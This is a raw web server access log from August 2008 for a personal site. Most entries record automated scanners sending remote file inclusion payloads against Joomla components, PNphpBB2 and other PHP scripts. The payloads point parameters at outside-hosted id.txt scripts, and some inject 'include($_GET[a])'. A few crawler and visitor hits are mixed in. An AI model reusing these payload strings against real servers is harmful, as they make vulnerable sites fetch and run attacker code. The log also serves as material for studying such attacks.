58.102.118.201 - - [10/Aug/2008:13:28:36 -0700] "GET /index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 200 18409 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:28:36 -0700] "GET /index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 200 18393 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:28:36 -0700] "GET /index.php?fn=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 200 18389 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:28:36 -0700] "GET /index.php?fn=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 200 18373 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:28:36 -0700] "GET /logs/index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:28:36 -0700] "GET /logs/index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:28:36 -0700] "GET /logs/index.php?fn=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:28:36 -0700] "GET /logs/index.php?fn=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.58 - - [10/Aug/2008:13:28:44 -0700] "GET /?show=gallery&pageid=17 HTTP/1.1" 200 54301 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:29:00 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:29:00 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:29:06 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:29:07 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.252.180.117 - - [10/Aug/2008:13:29:11 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
132.252.180.117 - - [10/Aug/2008:13:29:11 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
132.252.180.117 - - [10/Aug/2008:13:29:11 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:30:02 -0700] "GET /logs/access_071218.log/index.php?fn=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:30:02 -0700] "GET /logs/access_071218.log/index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:30:02 -0700] "GET /logs/access_071218.log/index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:30:02 -0700] "GET /logs/access_071218.log/index.php?fn=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:13:32:02 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.252.180.117 - - [10/Aug/2008:13:32:19 -0700] "GET /logs/access_080224.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.249.70.58 - - [10/Aug/2008:13:32:23 -0700] "GET /logs/access.log HTTP/1.1" 200 478706 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:32:39 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:32:39 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:32:39 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:32:42 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:13:32:47 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:33:31 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:33:31 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:33:32 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:33:35 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:33:35 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:33:36 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 3694 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:33:45 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.230.197.245 - - [10/Aug/2008:13:33:46 -0700] "GET /logs/access.log/index.php?sayfa=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [10/Aug/2008:13:33:46 -0700] "GET /logs/index.php?sayfa=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.97.132.101 - - [10/Aug/2008:13:34:17 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [10/Aug/2008:13:34:17 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:34:21 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:34:21 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:34:21 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [10/Aug/2008:13:34:21 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.0" 200 3678 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [10/Aug/2008:13:34:28 -0700] "GET /logs/access_080308.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:34:45 -0700] "GET /logs/access_080214.log//index1.php?site=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:34:46 -0700] "GET /logs/access_080311.log//index1.php?site=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:35:39 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:35:39 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:35:39 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:35:46 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:35:49 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:35:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:35:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:10 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:32 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:34 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:35 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:38 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:39 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:42 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:42 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:13:36:43 -0700] "GET /logs/access_080521.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:44 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:44 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:45 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:48 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:48 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:48 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:50 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:53 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:36:57 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:37:00 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:37:01 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:37:55 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:37:55 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:37:56 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:37:56 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.8.223.144 - - [10/Aug/2008:13:38:14 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [10/Aug/2008:13:38:14 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [10/Aug/2008:13:38:17 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
204.8.223.144 - - [10/Aug/2008:13:38:25 -0700] "GET /logs/access_080303.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rajacademy.com/shop/blocks/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:38:28 -0700] "GET /errors.php?error=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:38:28 -0700] "GET /logs/access_080122.log/errors.php?error=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.53.240.146 - - [10/Aug/2008:13:38:28 -0700] "GET /logs/errors.php?error=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
82.137.200.6 - - [10/Aug/2008:13:38:41 -0700] "GET /blog/index.php/feed/?show=slide HTTP/1.0" 200 14325 "http://images.google.com/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1136.JPG&imgrefurl=http://dmulk.com/blog/index.php/feed/%3Fshow%3Dslide&h=2592&w=3888&sz=4155&hl=en&start=198&tbnid=bzknKkT7t666RM:&tbnh=100&tbnw=150&prev=/images%3Fq%3Dsiesta%26start%3D180%26imgsz%3Dhuge%26gbv%3D2%26ndsp%3D18%26hl%3Den%26newwindow%3D1%26safe%3Doff%26sa%3DN" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:38:51 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:38:51 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:38:54 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:39:01 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
